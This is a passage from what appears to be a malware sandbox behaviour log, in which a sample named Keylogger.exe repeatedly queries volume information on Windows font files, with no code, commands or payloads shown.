                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
